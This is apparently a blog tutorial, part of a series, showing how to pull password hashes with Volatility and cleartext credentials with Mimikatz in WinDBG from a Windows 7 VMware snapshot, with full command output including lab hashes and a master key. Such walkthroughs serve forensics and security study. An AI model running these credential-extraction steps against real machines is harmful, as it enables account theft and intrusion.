Memdumps, Volatility, Mimikatz, VMs – Part 6: VMWare Workstation

The VM is running Windows 7.
From the running machine take the snapshot:
workstf1e79bd53e31d6944a7d87fe92f6aab4
Now it is possible to perform the volatility stuff directly with the .vmem file from the snapshot:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f “C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmem” imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search…
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win200
8R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (C:\Users\dax\Documents\Virtua
l Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf800029f50a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff800029f6d00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-29 17:48:24 UTC+0000
     Image local date and time : 2016-01-29 18:48:24 +0100
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f “C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmem” –profile=Win7SP1x64 hivelist
Volatility Foundation Volatility Framework 2.5
Virtual            Physical           Name
—————— —————— —-
0xfffff8a001ea6010 0x000000006a5f9010 \??\C:\Users\test\AppData\Local\Microsoft\
Windows\UsrClass.dat
0xfffff8a00000d250 0x000000002d4e6250 [no name]
0xfffff8a000024010 0x000000002d491010 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000052010 0x000000002d53f010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a0000f6410 0x0000000024cbf410 \SystemRoot\System32\Config\DEFAULT
0xfffff8a000fec010 0x0000000026cbf010 \Device\HarddiskVolume1\Boot\BCD
0xfffff8a001003010 0x0000000023191010 \SystemRoot\System32\Config\SOFTWARE
0xfffff8a001263010 0x000000001d2a5010 \SystemRoot\System32\Config\SECURITY
0xfffff8a0012f6010 0x000000001d138010 \SystemRoot\System32\Config\SAM
0xfffff8a0013ea010 0x0000000015820010 \??\C:\Windows\ServiceProfiles\LocalServic
e\NTUSER.DAT
0xfffff8a001439010 0x0000000015446010 \??\C:\Windows\ServiceProfiles\NetworkServ
ice\NTUSER.DAT
0xfffff8a001e0d010 0x00000000355c7010 \??\C:\Users\test\ntuser.dat
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe hashdump -f “C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7×64-Snapshot1.vmem” –profile=Win7SP1x64 -y 0xfffff8a000024010 -s 0xfffff8a0012f
6010
Volatility Foundation Volatility Framework 2.5
Administrator:500:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Gast:501:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
test:1000:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
WinDBG
The method with windbg works too. But first the image needs to be converted. Download vmss2core (https://labs.vmware.com/flings/vmss2core).
Then convert the image:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>..\vmss2core-win.exe -W “C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmsn ” “C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1 .vmem”
vmss2core version 2452889 Copyright (C) 1998-2015 VMware, Inc. All rights reserv
ed.
… 10 MBs written.
… 20 MBs written.
… 30 MBs written.
… 40 MBs written.
… 50 MBs written.
… 60 MBs written.
… 70 MBs written.
… 80 MBs written.
… 90 MBs written.
… 100 MBs written.
Then just go on like in part 3:
Microsoft (R) Windows Debugger Version 6.3.9600.17336 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
Loading Dump File [C:\Users\dax\Downloads\volatility_2.5.win.standalone\memory.dmp]
Kernel Complete Dump File: Full address space is available
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path.           *
* Use .symfix to have the debugger choose a symbol path.                   *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is:
*********************************************************************
* Symbols can not be loaded because symbol path is not initialized. *
*                                                                   *
* The Symbol Path can be set by:                                    *
*   using the _NT_SYMBOL_PATH environment variable.                 *
*   using the -y <symbol_path> argument when starting the debugger. *
*   using .sympath and .sympath+                                    *
*********************************************************************
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntkrnlmp.exe –
Windows 7 Kernel Version 7601 (Service Pack 1) UP Free x64
Product: WinNt, suite: TerminalServer SingleUserTS Personal
Built by: 7601.17514.amd64fre.win7sp1_rtm.101119-1850
Machine Name:
Kernel base = 0xfffff800`02804000 PsLoadedModuleList = 0xfffff800`02a49e90
Debug session time: Fri Jan 29 18:48:24.926 2016 (UTC + 1:00)
System Uptime: 0 days 0:05:16.423
*********************************************************************
* Symbols can not be loaded because symbol path is not initialized. *
*                                                                   *
* The Symbol Path can be set by:                                    *
*   using the _NT_SYMBOL_PATH environment variable.                 *
*   using the -y <symbol_path> argument when starting the debugger. *
*   using .sympath and .sympath+                                    *
*********************************************************************
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntkrnlmp.exe –
Loading Kernel Symbols
………………………………………………………
……………………………………………………….
………………….
Loading User Symbols
……………………………………………………….
……………………..
Loading unloaded module list
….*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll –
************* Symbol Loading Error Summary **************
Module name            Error
ntkrnlmp               The system cannot find the file specified
ntdll                  The system cannot find the file specified
You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for vmtools.dll –
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************
Use !analyze -v to get detailed debugging information.
BugCheck 80, {4f4454, 0, 0, 0}
*** ERROR: Module load completed but symbols could not be loaded for mssmbios.sys
***** Kernel symbols are WRONG. Please fix symbols to do analysis.
*************************************************************************
***                                                                   ***
***                                                                   ***
***    Either you specified an unqualified symbol, or your debugger   ***
***    doesn’t have full symbol information.  Unqualified symbol      ***
***    resolution is turned off by default. Please either specify a   ***
***    fully qualified symbol module!symbolname, or enable resolution ***
***    of unqualified symbols by typing “.symopt- 100”. Note that   ***
***    enabling unqualified symbol resolution with network symbol     ***
***    server shares in the symbol path may cause the debugger to     ***
***    appear to hang for long periods of time when an incorrect      ***
***    symbol name is typed or the network symbol server is down.     ***
***                                                                   ***
***    For some commands to work properly, your symbol path           ***
***    must point to .pdb files that have full type information.      ***
***                                                                   ***
***    Certain .pdb files (such as the public OS symbols) do not      ***
***    contain the required information.  Contact the group that      ***
***    provided you with these symbols if you need this command to    ***
***    work.                                                          ***
***                                                                   ***
***    Type referenced: nt!_KPRCB                                     ***
***                                                                   ***
*************************************************************************
*************************************************************************
***                                                                   ***
***                                                                   ***
***    Either you specified an unqualified symbol, or your debugger   ***
***    doesn’t have full symbol information.  Unqualified symbol      ***
***    resolution is turned off by default. Please either specify a   ***
***    fully qualified symbol module!symbolname, or enable resolution ***
***    of unqualified symbols by typing “.symopt- 100”. Note that   ***
***    enabling unqualified symbol resolution with network symbol     ***
***    server shares in the symbol path may cause the debugger to     ***
***    appear to hang for long periods of time when an incorrect      ***
***    symbol name is typed or the network symbol server is down.     ***
***                                                                   ***
***    For some commands to work properly, your symbol path           ***
***    must point to .pdb files that have full type information.      ***
***                                                                   ***
***    Certain .pdb files (such as the public OS symbols) do not      ***
***    contain the required information.  Contact the group that      ***
***    provided you with these symbols if you need this command to    ***
***    work.                                                          ***
***                                                                   ***
***    Type referenced: nt!_KPRCB                                     ***
***                                                                   ***
*************************************************************************
*************************************************************************
***                                                                   ***
***                                                                   ***
***    Either you specified an unqualified symbol, or your debugger   ***
***    doesn’t have full symbol information.  Unqualified symbol      ***
***    resolution is turned off by default. Please either specify a   ***
***    fully qualified symbol module!symbolname, or enable resolution ***
***    of unqualified symbols by typing “.symopt- 100”. Note that   ***
***    enabling unqualified symbol resolution with network symbol     ***
***    server shares in the symbol path may cause the debugger to     ***
***    appear to hang for long periods of time when an incorrect      ***
***    symbol name is typed or the network symbol server is down.     ***
***                                                                   ***
***    For some commands to work properly, your symbol path           ***
***    must point to .pdb files that have full type information.      ***
***                                                                   ***
***    Certain .pdb files (such as the public OS symbols) do not      ***
***    contain the required information.  Contact the group that      ***
***    provided you with these symbols if you need this command to    ***
***    work.                                                          ***
***                                                                   ***
***    Type referenced: nt!_KPRCB                                     ***
***                                                                   ***
*************************************************************************
*********************************************************************
* Symbols can not be loaded because symbol path is not initialized. *
*                                                                   *
* The Symbol Path can be set by:                                    *
*   using the _NT_SYMBOL_PATH environment variable.                 *
*   using the -y <symbol_path> argument when starting the debugger. *
*   using .sympath and .sympath+                                    *
*********************************************************************
Probably caused by : ntkrnlmp.exe
Followup: MachineOwner
———
kd> .load c:\users\dax\downloads\mimikatz\x64\mimilib.dll
  .#####.   mimikatz 2.0 alpha (x64) built on Jan 17 2016 00:38:45
 .## ^ ##.  “A La Vie, A L’Amour” – Windows build 7601
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ‘## v ##’   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  ‘#####’                                  WinDBG extension ! * * */
===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================
kd> !process 0 0 lsass.exe
NT symbols are incorrect, please fix symbols
kd> .SymFix
kd> .Reload
Loading Kernel Symbols
………………………………………………………
……………………………………………………….
………………….
Loading User Symbols
……………………………………………………….
……………………..
Loading unloaded module list
….Unable to enumerate user-mode unloaded modules, NTSTATUS 0xC0000147
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for vmtools.dll –
************* Symbol Loading Error Summary **************
Module name            Error
vmtools                PDB not found : cache*
                       No data is available : SRV*http://msdl.microsoft.com/download/symbols
You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
kd> !process 0 0 lsass.exe
PROCESS fffffa8003a7bb30
    SessionId: 0  Cid: 020c    Peb: 7fffffdb000  ParentCid: 01a4
    DirBase: 1e66e000  ObjectTable: fffff8a00123c6e0  HandleCount: 538.
    Image: lsass.exe
kd> .process /r /p fffffa8003a7bb30
Implicit process is now fffffa80`03a7bb30
Loading User Symbols
……………………………………………………
kd> !mimikatz
DPAPI Backup keys
=================
Current prefered key:       {00000000-0000-0000-0000-000000000000}
Compatibility prefered key: {00000000-0000-0000-0000-000000000000}
SekurLSA
========
Authentication Id : 0 ; 430604 (00000000:0006920c)
Session           : Interactive from 1
User Name         : test
Domain            : WIN-254BC5SVOCB
Logon Server      : WIN-254BC5SVOCB
Logon Time        : 29.01.2016 18:46:10
SID               : S-1-5-21-1016508660-14321150-529431041-1000
    msv :
     [00000003] Primary
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * LM       : 624aac413795cdc1aad3b435b51404ee
     * NTLM     : c5a237b7e9d8e708d8436b6148a25fa1
     * SHA1     : 39cfdb69532cff3336f08a83aac42524f41cd6e9
    tspkg :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    wdigest :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    kerberos :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
     * Key List
       aes256_hmac       <no size, buffer is incorrect>
       aes128_hmac       <no size, buffer is incorrect>
       rc4_hmac_nt       c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_old      c5a237b7e9d8e708d8436b6148a25fa1
       rc4_md4           c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_nt_exp   c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_old_exp  c5a237b7e9d8e708d8436b6148a25fa1
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 430574 (00000000:000691ee)
Session           : Interactive from 1
User Name         : test
Domain            : WIN-254BC5SVOCB
Logon Server      : WIN-254BC5SVOCB
Logon Time        : 29.01.2016 18:46:10
SID               : S-1-5-21-1016508660-14321150-529431041-1000
    msv :
     [00000003] Primary
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * LM       : 624aac413795cdc1aad3b435b51404ee
     * NTLM     : c5a237b7e9d8e708d8436b6148a25fa1
     * SHA1     : 39cfdb69532cff3336f08a83aac42524f41cd6e9
    tspkg :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    wdigest :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    kerberos :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
     * Key List
       aes256_hmac       <no size, buffer is incorrect>
       aes128_hmac       <no size, buffer is incorrect>
       rc4_hmac_nt       c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_old      c5a237b7e9d8e708d8436b6148a25fa1
       rc4_md4           c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_nt_exp   c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_old_exp  c5a237b7e9d8e708d8436b6148a25fa1
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOKALER DIENST
Domain            : NT-AUTORITÄT
Logon Server      :
Logon Time        : 29.01.2016 18:43:31
SID               : S-1-5-19
    msv :
    tspkg : KO
    wdigest :
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    kerberos :
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-254BC5SVOCB$
Domain            : WORKGROUP
Logon Server      :
Logon Time        : 29.01.2016 18:43:31
SID               : S-1-5-20
    msv :
    tspkg : KO
    wdigest :
     * Username : WIN-254BC5SVOCB$
     * Domain   : WORKGROUP
     * Password : (null)
    kerberos :
     * Username : win-254bc5svocb$
     * Domain   : WORKGROUP
     * Password : (null)
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 48578 (00000000:0000bdc2)
Session           : UndefinedLogonType from 0
User Name         :
Domain            :
Logon Server      :
Logon Time        : 29.01.2016 18:43:29
SID               :
    msv :
    tspkg : KO
    wdigest : KO
    kerberos : KO
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-254BC5SVOCB$
Domain            : WORKGROUP
Logon Server      :
Logon Time        : 29.01.2016 18:43:29
SID               : S-1-5-18
    msv :
    tspkg : KO
    wdigest :
     * Username : WIN-254BC5SVOCB$
     * Domain   : WORKGROUP
     * Password : (null)
    kerberos :
     * Username : win-254bc5svocb$
     * Domain   : WORKGROUP
     * Password : (null)
    ssp :
    masterkey :
     [00000000]
     * GUID      :    {f22e410f-f947-4e08-8f2a-8f65df603f8d}
     * Time      :    29.01.2016 17:43:30
     * MasterKey :    19c05880b67d50f8231cd8009836e3cdc55610e4877f8b976abd5ca15600d0e759934324c6204b56f02527039e7fc52a1dfb5296d3381aaa7c3eb610dffa32fa
    credman :

Advertisements

One thought on “Memdumps, Volatility, Mimikatz, VMs – Part 6: VMWare Workstation

  1. Pingback: Memdumps, Volatility, Mimikatz, VMs – Overview | govolution

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s